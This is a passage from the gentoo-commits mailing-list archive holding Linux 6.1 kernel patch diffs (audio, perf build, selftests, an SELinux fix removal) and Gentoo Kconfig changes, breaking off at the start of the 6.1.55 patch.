+ static int axg_spdifin_iec958_info(struct snd_kcontrol *kcontrol,
+diff --git a/sound/soc/sof/core.c b/sound/soc/sof/core.c
+index 75a1e2c6539f2..eaa16755a2704 100644
+--- a/sound/soc/sof/core.c
++++ b/sound/soc/sof/core.c
+@@ -461,10 +461,9 @@ int snd_sof_device_remove(struct device *dev)
+ 		snd_sof_ipc_free(sdev);
+ 		snd_sof_free_debug(sdev);
+ 		snd_sof_remove(sdev);
++		sof_ops_free(sdev);
+ 	}
+ 
+-	sof_ops_free(sdev);
+-
+ 	/* release firmware */
+ 	snd_sof_fw_unload(sdev);
+ 
+diff --git a/sound/soc/sof/intel/mtl.c b/sound/soc/sof/intel/mtl.c
+index 10298532816fe..d7048f1d6a048 100644
+--- a/sound/soc/sof/intel/mtl.c
++++ b/sound/soc/sof/intel/mtl.c
+@@ -453,7 +453,7 @@ static int mtl_dsp_cl_init(struct snd_sof_dev *sdev, int stream_tag, bool imr_bo
+ 	/* step 3: wait for IPC DONE bit from ROM */
+ 	ret = snd_sof_dsp_read_poll_timeout(sdev, HDA_DSP_BAR, chip->ipc_ack, status,
+ 					    ((status & chip->ipc_ack_mask) == chip->ipc_ack_mask),
+-					    HDA_DSP_REG_POLL_INTERVAL_US, MTL_DSP_PURGE_TIMEOUT_US);
++					    HDA_DSP_REG_POLL_INTERVAL_US, HDA_DSP_INIT_TIMEOUT_US);
+ 	if (ret < 0) {
+ 		if (hda->boot_iteration == HDA_FW_BOOT_ATTEMPTS)
+ 			dev_err(sdev->dev, "timeout waiting for purge IPC done\n");
+diff --git a/sound/soc/sof/intel/mtl.h b/sound/soc/sof/intel/mtl.h
+index 788bf0e3ea879..00e3526889d3d 100644
+--- a/sound/soc/sof/intel/mtl.h
++++ b/sound/soc/sof/intel/mtl.h
+@@ -54,7 +54,6 @@
+ #define MTL_DSP_IRQSTS_IPC		BIT(0)
+ #define MTL_DSP_IRQSTS_SDW		BIT(6)
+ 
+-#define MTL_DSP_PURGE_TIMEOUT_US	20000000 /* 20s */
+ #define MTL_DSP_REG_POLL_INTERVAL_US	10	/* 10 us */
+ 
+ /* Memory windows */
+diff --git a/tools/include/linux/btf_ids.h b/tools/include/linux/btf_ids.h
+index 71e54b1e37964..2f882d5cb30f5 100644
+--- a/tools/include/linux/btf_ids.h
++++ b/tools/include/linux/btf_ids.h
+@@ -38,7 +38,7 @@ asm(							\
+ 	____BTF_ID(symbol)
+ 
+ #define __ID(prefix) \
+-	__PASTE(prefix, __COUNTER__)
++	__PASTE(__PASTE(prefix, __COUNTER__), __LINE__)
+ 
+ /*
+  * The BTF_ID defines unique symbol for each ID pointing
+diff --git a/tools/include/linux/mm.h b/tools/include/linux/mm.h
+index a03d9bba51514..43be27bcc897d 100644
+--- a/tools/include/linux/mm.h
++++ b/tools/include/linux/mm.h
+@@ -11,8 +11,6 @@
+ 
+ #define PHYS_ADDR_MAX	(~(phys_addr_t)0)
+ 
+-#define __ALIGN_KERNEL(x, a)		__ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)
+-#define __ALIGN_KERNEL_MASK(x, mask)	(((x) + (mask)) & ~(mask))
+ #define ALIGN(x, a)			__ALIGN_KERNEL((x), (a))
+ #define ALIGN_DOWN(x, a)		__ALIGN_KERNEL((x) - ((a) - 1), (a))
+ 
+diff --git a/tools/include/linux/seq_file.h b/tools/include/linux/seq_file.h
+index 102fd9217f1f9..f6bc226af0c1d 100644
+--- a/tools/include/linux/seq_file.h
++++ b/tools/include/linux/seq_file.h
+@@ -1,4 +1,6 @@
+ #ifndef _TOOLS_INCLUDE_LINUX_SEQ_FILE_H
+ #define _TOOLS_INCLUDE_LINUX_SEQ_FILE_H
+ 
++struct seq_file;
++
+ #endif /* _TOOLS_INCLUDE_LINUX_SEQ_FILE_H */
+diff --git a/tools/include/uapi/linux/bpf.h b/tools/include/uapi/linux/bpf.h
+index 51b9aa640ad2a..53bc487947197 100644
+--- a/tools/include/uapi/linux/bpf.h
++++ b/tools/include/uapi/linux/bpf.h
+@@ -1837,7 +1837,9 @@ union bpf_attr {
+  * 		performed again, if the helper is used in combination with
+  * 		direct packet access.
+  * 	Return
+- * 		0 on success, or a negative error in case of failure.
++ * 		0 on success, or a negative error in case of failure. Positive
++ * 		error indicates a potential drop or congestion in the target
++ * 		device. The particular positive error codes are not defined.
+  *
+  * u64 bpf_get_current_pid_tgid(void)
+  * 	Description
+diff --git a/tools/perf/util/Build b/tools/perf/util/Build
+index e315ecaec3233..2c364a9087a22 100644
+--- a/tools/perf/util/Build
++++ b/tools/perf/util/Build
+@@ -276,6 +276,12 @@ ifeq ($(BISON_GE_35),1)
+ else
+   bison_flags += -w
+ endif
++
++BISON_LT_381 := $(shell expr $(shell $(BISON) --version | grep bison | sed -e 's/.\+ \([0-9]\+\).\([0-9]\+\).\([0-9]\+\)/\1\2\3/g') \< 381)
++ifeq ($(BISON_LT_381),1)
++  bison_flags += -DYYNOMEM=YYABORT
++endif
++
+ CFLAGS_parse-events-bison.o += $(bison_flags)
+ CFLAGS_pmu-bison.o          += -DYYLTYPE_IS_TRIVIAL=0 $(bison_flags)
+ CFLAGS_expr-bison.o         += -DYYLTYPE_IS_TRIVIAL=0 $(bison_flags)
+diff --git a/tools/testing/memblock/tests/basic_api.c b/tools/testing/memblock/tests/basic_api.c
+index a13a57ba0815f..7ce628e31a431 100644
+--- a/tools/testing/memblock/tests/basic_api.c
++++ b/tools/testing/memblock/tests/basic_api.c
+@@ -1,7 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0-or-later
++#include "basic_api.h"
+ #include <string.h>
+ #include <linux/memblock.h>
+-#include "basic_api.h"
+ 
+ #define EXPECTED_MEMBLOCK_REGIONS			128
+ #define FUNC_ADD					"memblock_add"
+diff --git a/tools/testing/memblock/tests/common.h b/tools/testing/memblock/tests/common.h
+index d6bbbe63bfc36..4c33ce04c0645 100644
+--- a/tools/testing/memblock/tests/common.h
++++ b/tools/testing/memblock/tests/common.h
+@@ -5,6 +5,7 @@
+ #include <stdlib.h>
+ #include <assert.h>
+ #include <linux/types.h>
++#include <linux/seq_file.h>
+ #include <linux/memblock.h>
+ #include <linux/sizes.h>
+ #include <linux/printk.h>
+diff --git a/tools/testing/selftests/ftrace/test.d/instances/instance-event.tc b/tools/testing/selftests/ftrace/test.d/instances/instance-event.tc
+index 0eb47fbb3f44d..42422e4251078 100644
+--- a/tools/testing/selftests/ftrace/test.d/instances/instance-event.tc
++++ b/tools/testing/selftests/ftrace/test.d/instances/instance-event.tc
+@@ -39,7 +39,7 @@ instance_read() {
+ 
+ instance_set() {
+         while :; do
+-                echo 1 > foo/events/sched/sched_switch
++                echo 1 > foo/events/sched/sched_switch/enable
+         done 2> /dev/null
+ }
+ 
+diff --git a/tools/testing/selftests/kselftest_deps.sh b/tools/testing/selftests/kselftest_deps.sh
+index 708cb54296336..47a1281a3b702 100755
+--- a/tools/testing/selftests/kselftest_deps.sh
++++ b/tools/testing/selftests/kselftest_deps.sh
+@@ -46,11 +46,11 @@ fi
+ print_targets=0
+ 
+ while getopts "p" arg; do
+-    case $arg in
+-        p)
++	case $arg in
++		p)
+ 		print_targets=1
+ 	shift;;
+-    esac
++	esac
+ done
+ 
+ if [ $# -eq 0 ]
+@@ -92,6 +92,10 @@ pass_cnt=0
+ # Get all TARGETS from selftests Makefile
+ targets=$(egrep "^TARGETS +|^TARGETS =" Makefile | cut -d "=" -f2)
+ 
++# Initially, in LDLIBS related lines, the dep checker needs
++# to ignore lines containing the following strings:
++filter="\$(VAR_LDLIBS)\|pkg-config\|PKG_CONFIG\|IOURING_EXTRA_LIBS"
++
+ # Single test case
+ if [ $# -eq 2 ]
+ then
+@@ -100,6 +104,8 @@ then
+ 	l1_test $test
+ 	l2_test $test
+ 	l3_test $test
++	l4_test $test
++	l5_test $test
+ 
+ 	print_results $1 $2
+ 	exit $?
+@@ -113,7 +119,7 @@ fi
+ # Append space at the end of the list to append more tests.
+ 
+ l1_tests=$(grep -r --include=Makefile "^LDLIBS" | \
+-		grep -v "VAR_LDLIBS" | awk -F: '{print $1}')
++		grep -v "$filter" | awk -F: '{print $1}' | uniq)
+ 
+ # Level 2: LDLIBS set dynamically.
+ #
+@@ -126,7 +132,7 @@ l1_tests=$(grep -r --include=Makefile "^LDLIBS" | \
+ # Append space at the end of the list to append more tests.
+ 
+ l2_tests=$(grep -r --include=Makefile ": LDLIBS" | \
+-		grep -v "VAR_LDLIBS" | awk -F: '{print $1}')
++		grep -v "$filter" | awk -F: '{print $1}' | uniq)
+ 
+ # Level 3
+ # memfd and others use pkg-config to find mount and fuse libs
+@@ -138,11 +144,32 @@ l2_tests=$(grep -r --include=Makefile ": LDLIBS" | \
+ #	VAR_LDLIBS := $(shell pkg-config fuse --libs 2>/dev/null)
+ 
+ l3_tests=$(grep -r --include=Makefile "^VAR_LDLIBS" | \
+-		grep -v "pkg-config" | awk -F: '{print $1}')
++		grep -v "pkg-config\|PKG_CONFIG" | awk -F: '{print $1}' | uniq)
+ 
+-#echo $l1_tests
+-#echo $l2_1_tests
+-#echo $l3_tests
++# Level 4
++# some tests may fall back to default using `|| echo -l<libname>`
++# if pkg-config doesn't find the libs, instead of using VAR_LDLIBS
++# as per level 3 checks.
++# e.g:
++# netfilter/Makefile
++#	LDLIBS += $(shell $(HOSTPKG_CONFIG) --libs libmnl 2>/dev/null || echo -lmnl)
++l4_tests=$(grep -r --include=Makefile "^LDLIBS" | \
++		grep "pkg-config\|PKG_CONFIG" | awk -F: '{print $1}' | uniq)
++
++# Level 5
++# some tests may use IOURING_EXTRA_LIBS to add extra libs to LDLIBS,
++# which in turn may be defined in a sub-Makefile
++# e.g.:
++# mm/Makefile
++#	$(OUTPUT)/gup_longterm: LDLIBS += $(IOURING_EXTRA_LIBS)
++l5_tests=$(grep -r --include=Makefile "LDLIBS +=.*\$(IOURING_EXTRA_LIBS)" | \
++	awk -F: '{print $1}' | uniq)
++
++#echo l1_tests $l1_tests
++#echo l2_tests $l2_tests
++#echo l3_tests $l3_tests
++#echo l4_tests $l4_tests
++#echo l5_tests $l5_tests
+ 
+ all_tests
+ print_results $1 $2
+@@ -164,24 +191,32 @@ all_tests()
+ 	for test in $l3_tests; do
+ 		l3_test $test
+ 	done
++
++	for test in $l4_tests; do
++		l4_test $test
++	done
++
++	for test in $l5_tests; do
++		l5_test $test
++	done
+ }
+ 
+ # Use same parsing used for l1_tests and pick libraries this time.
+ l1_test()
+ {
+ 	test_libs=$(grep --include=Makefile "^LDLIBS" $test | \
+-			grep -v "VAR_LDLIBS" | \
++			grep -v "$filter" | \
+ 			sed -e 's/\:/ /' | \
+ 			sed -e 's/+/ /' | cut -d "=" -f 2)
+ 
+ 	check_libs $test $test_libs
+ }
+ 
+-# Use same parsing used for l2__tests and pick libraries this time.
++# Use same parsing used for l2_tests and pick libraries this time.
+ l2_test()
+ {
+ 	test_libs=$(grep --include=Makefile ": LDLIBS" $test | \
+-			grep -v "VAR_LDLIBS" | \
++			grep -v "$filter" | \
+ 			sed -e 's/\:/ /' | sed -e 's/+/ /' | \
+ 			cut -d "=" -f 2)
+ 
+@@ -197,6 +232,24 @@ l3_test()
+ 	check_libs $test $test_libs
+ }
+ 
++l4_test()
++{
++	test_libs=$(grep --include=Makefile "^VAR_LDLIBS\|^LDLIBS" $test | \
++			grep "\(pkg-config\|PKG_CONFIG\).*|| echo " | \
++			sed -e 's/.*|| echo //' | sed -e 's/)$//')
++
++	check_libs $test $test_libs
++}
++
++l5_test()
++{
++	tests=$(find $(dirname "$test") -type f -name "*.mk")
++	test_libs=$(grep "^IOURING_EXTRA_LIBS +\?=" $tests | \
++			cut -d "=" -f 2)
++
++	check_libs $test $test_libs
++}
++
+ check_libs()
+ {
+ 
+diff --git a/tools/testing/selftests/net/tls.c b/tools/testing/selftests/net/tls.c
+index c0ad8385441f2..5b80fb155d549 100644
+--- a/tools/testing/selftests/net/tls.c
++++ b/tools/testing/selftests/net/tls.c
+@@ -551,11 +551,11 @@ TEST_F(tls, sendmsg_large)
+ 
+ 		msg.msg_iov = &vec;
+ 		msg.msg_iovlen = 1;
+-		EXPECT_EQ(sendmsg(self->cfd, &msg, 0), send_len);
++		EXPECT_EQ(sendmsg(self->fd, &msg, 0), send_len);
+ 	}
+ 
+ 	while (recvs++ < sends) {
+-		EXPECT_NE(recv(self->fd, mem, send_len, 0), -1);
++		EXPECT_NE(recv(self->cfd, mem, send_len, 0), -1);
+ 	}
+ 
+ 	free(mem);
+@@ -584,9 +584,9 @@ TEST_F(tls, sendmsg_multiple)
+ 	msg.msg_iov = vec;
+ 	msg.msg_iovlen = iov_len;
+ 
+-	EXPECT_EQ(sendmsg(self->cfd, &msg, 0), total_len);
++	EXPECT_EQ(sendmsg(self->fd, &msg, 0), total_len);
+ 	buf = malloc(total_len);
+-	EXPECT_NE(recv(self->fd, buf, total_len, 0), -1);
++	EXPECT_NE(recv(self->cfd, buf, total_len, 0), -1);
+ 	for (i = 0; i < iov_len; i++) {
+ 		EXPECT_EQ(memcmp(test_strs[i], buf + len_cmp,
+ 				 strlen(test_strs[i])),
+diff --git a/tools/testing/selftests/powerpc/Makefile b/tools/testing/selftests/powerpc/Makefile
+index 6ba95cd19e423..c8c085fa05b05 100644
+--- a/tools/testing/selftests/powerpc/Makefile
++++ b/tools/testing/selftests/powerpc/Makefile
+@@ -45,28 +45,27 @@ $(SUB_DIRS):
+ include ../lib.mk
+ 
+ override define RUN_TESTS
+-	@for TARGET in $(SUB_DIRS); do \
++	+@for TARGET in $(SUB_DIRS); do \
+ 		BUILD_TARGET=$(OUTPUT)/$$TARGET;	\
+ 		$(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET run_tests;\
+ 	done;
+ endef
+ 
+ override define INSTALL_RULE
+-	@for TARGET in $(SUB_DIRS); do \
++	+@for TARGET in $(SUB_DIRS); do \
+ 		BUILD_TARGET=$(OUTPUT)/$$TARGET;	\
+ 		$(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET install;\
+ 	done;
+ endef
+ 
+-override define EMIT_TESTS
+-	@for TARGET in $(SUB_DIRS); do \
++emit_tests:
++	+@for TARGET in $(SUB_DIRS); do \
+ 		BUILD_TARGET=$(OUTPUT)/$$TARGET;	\
+-		$(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET emit_tests;\
++		$(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET $@;\
+ 	done;
+-endef
+ 
+ override define CLEAN
+-	@for TARGET in $(SUB_DIRS); do \
++	+@for TARGET in $(SUB_DIRS); do \
+ 		BUILD_TARGET=$(OUTPUT)/$$TARGET;	\
+ 		$(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET clean; \
+ 	done;
+@@ -76,4 +75,4 @@ endef
+ tags:
+ 	find . -name '*.c' -o -name '*.h' | xargs ctags
+ 
+-.PHONY: tags $(SUB_DIRS)
++.PHONY: tags $(SUB_DIRS) emit_tests
+diff --git a/tools/testing/selftests/powerpc/pmu/Makefile b/tools/testing/selftests/powerpc/pmu/Makefile
+index 30803353bd7cc..a284fa874a9f1 100644
+--- a/tools/testing/selftests/powerpc/pmu/Makefile
++++ b/tools/testing/selftests/powerpc/pmu/Makefile
+@@ -25,32 +25,36 @@ $(OUTPUT)/per_event_excludes: ../utils.c
+ DEFAULT_RUN_TESTS := $(RUN_TESTS)
+ override define RUN_TESTS
+ 	$(DEFAULT_RUN_TESTS)
+-	TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET run_tests
+-	TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET run_tests
+-	TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET run_tests
++	+TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET run_tests
++	+TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET run_tests
++	+TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET run_tests
+ endef
+ 
+-DEFAULT_EMIT_TESTS := $(EMIT_TESTS)
+-override define EMIT_TESTS
+-	$(DEFAULT_EMIT_TESTS)
+-	TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET emit_tests
+-	TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET emit_tests
+-	TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET emit_tests
+-endef
++emit_tests:
++	for TEST in $(TEST_GEN_PROGS); do \
++		BASENAME_TEST=`basename $$TEST`;	\
++		echo "$(COLLECTION):$$BASENAME_TEST";	\
++	done
++	+TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET emit_tests
++	+TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET emit_tests
++	+TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET emit_tests
+ 
+ DEFAULT_INSTALL_RULE := $(INSTALL_RULE)
+ override define INSTALL_RULE
+ 	$(DEFAULT_INSTALL_RULE)
+-	TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET install
+-	TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET install
+-	TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET install
++	+TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET install
++	+TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET install
++	+TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET install
+ endef
+ 
+-clean:
++DEFAULT_CLEAN := $(CLEAN)
++override define CLEAN
++	$(DEFAULT_CLEAN)
+ 	$(RM) $(TEST_GEN_PROGS) $(OUTPUT)/loop.o
+-	TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET clean
+-	TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET clean
+-	TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET clean
++	+TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET clean
++	+TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET clean
++	+TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET clean
++endef
+ 
+ ebb:
+ 	TARGET=$@; BUILD_TARGET=$$OUTPUT/$$TARGET; mkdir -p $$BUILD_TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -k -C $$TARGET all
+@@ -61,4 +65,4 @@ sampling_tests:
+ event_code_tests:
+ 	TARGET=$@; BUILD_TARGET=$$OUTPUT/$$TARGET; mkdir -p $$BUILD_TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -k -C $$TARGET all
+ 
+-.PHONY: all run_tests clean ebb sampling_tests event_code_tests
++.PHONY: all run_tests ebb sampling_tests event_code_tests emit_tests


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-05 14:23 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-05 14:23 UTC (permalink / raw
  To: gentoo-commits

commit:     b34204a3e7f9be1d039f1b914643e23ddb0166fa
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Oct  5 14:04:01 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Oct  5 14:23:39 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=b34204a3

select BLK_DEV_BSG if SCSI as it depends on it.

Thanks, Ancient.

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 4567_distro-Gentoo-Kconfig.patch | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/4567_distro-Gentoo-Kconfig.patch b/4567_distro-Gentoo-Kconfig.patch
index 9cb1eb0c..195c7d47 100644
--- a/4567_distro-Gentoo-Kconfig.patch
+++ b/4567_distro-Gentoo-Kconfig.patch
@@ -122,7 +122,7 @@
 +	depends on GENTOO_LINUX && GENTOO_LINUX_UDEV
 +
 +	select AUTOFS_FS
-+	select BLK_DEV_BSG
++	select BLK_DEV_BSG if SCSI
 +	select BPF_SYSCALL
 +	select CGROUP_BPF
 +	select CGROUPS


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-23 11:03 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-23 11:03 UTC (permalink / raw
  To: gentoo-commits

commit:     5f0da340c312b96c5645d105e56a06674020ee3a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Sep 23 11:03:17 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Sep 23 11:03:17 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5f0da340

Remove redundant patch

Removed:
1515_selinux-fix-handling-of-empty-opts.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                   |  4 ---
 1515_selinux-fix-handling-of-empty-opts.patch | 51 ---------------------------
 2 files changed, 55 deletions(-)

diff --git a/0000_README b/0000_README
index 44dd3ca6..3723582e 100644
--- a/0000_README
+++ b/0000_README
@@ -271,10 +271,6 @@ Patch:  1510_fs-enable-link-security-restrictions-by-default.patch
 From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch/
 Desc:   Enable link security restrictions by default.
 
-Patch:  1515_selinux-fix-handling-of-empty-opts.patch
-From:   https://www.spinics.net/lists/linux-fsdevel/msg249428.html
-Desc:   selinux: fix handling of empty opts in selinux_fs_context_submount()
-
 Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 

diff --git a/1515_selinux-fix-handling-of-empty-opts.patch b/1515_selinux-fix-handling-of-empty-opts.patch
deleted file mode 100644
index 10336ec5..00000000
--- a/1515_selinux-fix-handling-of-empty-opts.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-selinux: fix handling of empty opts in selinux_fs_context_submount()
-
-selinux_set_mnt_opts() relies on the fact that the mount options pointer
-is always NULL when all options are unset (specifically in its
-!selinux_initialized() branch. However, the new
-selinux_fs_context_submount() hook breaks this rule by allocating a new
-structure even if no options are set. That causes any submount created
-before a SELinux policy is loaded to be rejected in
-selinux_set_mnt_opts().
-
-Fix this by making selinux_fs_context_submount() leave fc->security
-set to NULL when there are no options to be copied from the reference
-superblock.
-
-Reported-by: Adam Williamson <awilliam@xxxxxxxxxx>
-Link: https://bugzilla.redhat.com/show_bug.cgi?id=2236345
-Fixes: d80a8f1b58c2 ("vfs, security: Fix automount superblock LSM init problem, preventing NFS sb sharing")
-Signed-off-by: Ondrej Mosnacek <omosnace@xxxxxxxxxx>
----
- security/selinux/hooks.c | 10 ++++++++--
- 1 file changed, 8 insertions(+), 2 deletions(-)
-
-diff --git a/security/selinux/hooks.c b/security/selinux/hooks.c
-index 10350534de6d6..2aa0e219d7217 100644
---- a/security/selinux/hooks.c
-+++ b/security/selinux/hooks.c
-@@ -2775,14 +2775,20 @@ static int selinux_umount(struct vfsmount *mnt, int flags)
- static int selinux_fs_context_submount(struct fs_context *fc,
- 				   struct super_block *reference)
- {
--	const struct superblock_security_struct *sbsec;
-+	const struct superblock_security_struct *sbsec = selinux_superblock(reference);
- 	struct selinux_mnt_opts *opts;
- 
-+	/*
-+	 * Ensure that fc->security remains NULL when no options are set
-+	 * as expected by selinux_set_mnt_opts().
-+	 */
-+	if (!(sbsec->flags & (FSCONTEXT_MNT|CONTEXT_MNT|DEFCONTEXT_MNT)))
-+		return 0;
-+
- 	opts = kzalloc(sizeof(*opts), GFP_KERNEL);
- 	if (!opts)
- 		return -ENOMEM;
- 
--	sbsec = selinux_superblock(reference);
- 	if (sbsec->flags & FSCONTEXT_MNT)
- 		opts->fscontext_sid = sbsec->sid;
- 	if (sbsec->flags & CONTEXT_MNT)
--- 
-2.41.0


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-23 10:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-23 10:16 UTC (permalink / raw
  To: gentoo-commits

commit:     ef07f67f88d6a918eb7d3f2cd2627d293e7ef30f
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Sep 23 10:16:09 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Sep 23 10:16:09 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ef07f67f

Linux patch 6.1.55

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1054_linux-6.1.55.patch | 6107 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 6111 insertions(+)

diff --git a/0000_README b/0000_README
index e831e898..44dd3ca6 100644
--- a/0000_README
+++ b/0000_README
@@ -259,6 +259,10 @@ Patch:  1053_linux-6.1.54.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.54
 
+Patch:  1054_linux-6.1.55.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.55
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1054_linux-6.1.55.patch b/1054_linux-6.1.55.patch
new file mode 100644
index 00000000..b9b1e43f
--- /dev/null
+++ b/1054_linux-6.1.55.patch
@@ -0,0 +1,6107 @@
+diff --git a/Documentation/admin-guide/cgroup-v1/memory.rst b/Documentation/admin-guide/cgroup-v1/memory.rst
+index 34911ce5e4b50..2524061836acc 100644
+--- a/Documentation/admin-guide/cgroup-v1/memory.rst
++++ b/Documentation/admin-guide/cgroup-v1/memory.rst
+@@ -91,6 +91,8 @@ Brief summary of control files.
+  memory.oom_control		     set/show oom controls.
+  memory.numa_stat		     show the number of memory usage per numa
+ 				     node
++ memory.kmem.limit_in_bytes          This knob is deprecated and writing to
++                                     it will return -ENOTSUPP.
+  memory.kmem.usage_in_bytes          show current kernel memory allocation
+  memory.kmem.failcnt                 show the number of kernel memory usage
+ 				     hits limits
+diff --git a/Documentation/arm64/silicon-errata.rst b/Documentation/arm64/silicon-errata.rst
+index b3c8ac6a2c385..9000640f7f7a0 100644
+--- a/Documentation/arm64/silicon-errata.rst
++++ b/Documentation/arm64/silicon-errata.rst
+@@ -193,6 +193,9 @@ stable kernels.
+ +----------------+-----------------+-----------------+-----------------------------+
+ | Hisilicon      | Hip08 SMMU PMCG | #162001800      | N/A                         |
+ +----------------+-----------------+-----------------+-----------------------------+
++| Hisilicon      | Hip08 SMMU PMCG | #162001900      | N/A                         |
++|                | Hip09 SMMU PMCG |                 |                             |
+++----------------+-----------------+-----------------+-----------------------------+
+ +----------------+-----------------+-----------------+-----------------------------+
+ | Qualcomm Tech. | Kryo/Falkor v1  | E1003           | QCOM_FALKOR_ERRATUM_1003    |
+ +----------------+-----------------+-----------------+-----------------------------+
+diff --git a/Makefile b/Makefile
+index 844afa653fdda..3d839824a7224 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 54
++SUBLEVEL = 55
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/kernel/hw_breakpoint.c b/arch/arm/kernel/hw_breakpoint.c
+index 054e9199f30db..dc0fb7a813715 100644
+--- a/arch/arm/kernel/hw_breakpoint.c
++++ b/arch/arm/kernel/hw_breakpoint.c
+@@ -626,7 +626,7 @@ int hw_breakpoint_arch_parse(struct perf_event *bp,
+ 	hw->address &= ~alignment_mask;
+ 	hw->ctrl.len <<= offset;
+ 
+-	if (is_default_overflow_handler(bp)) {
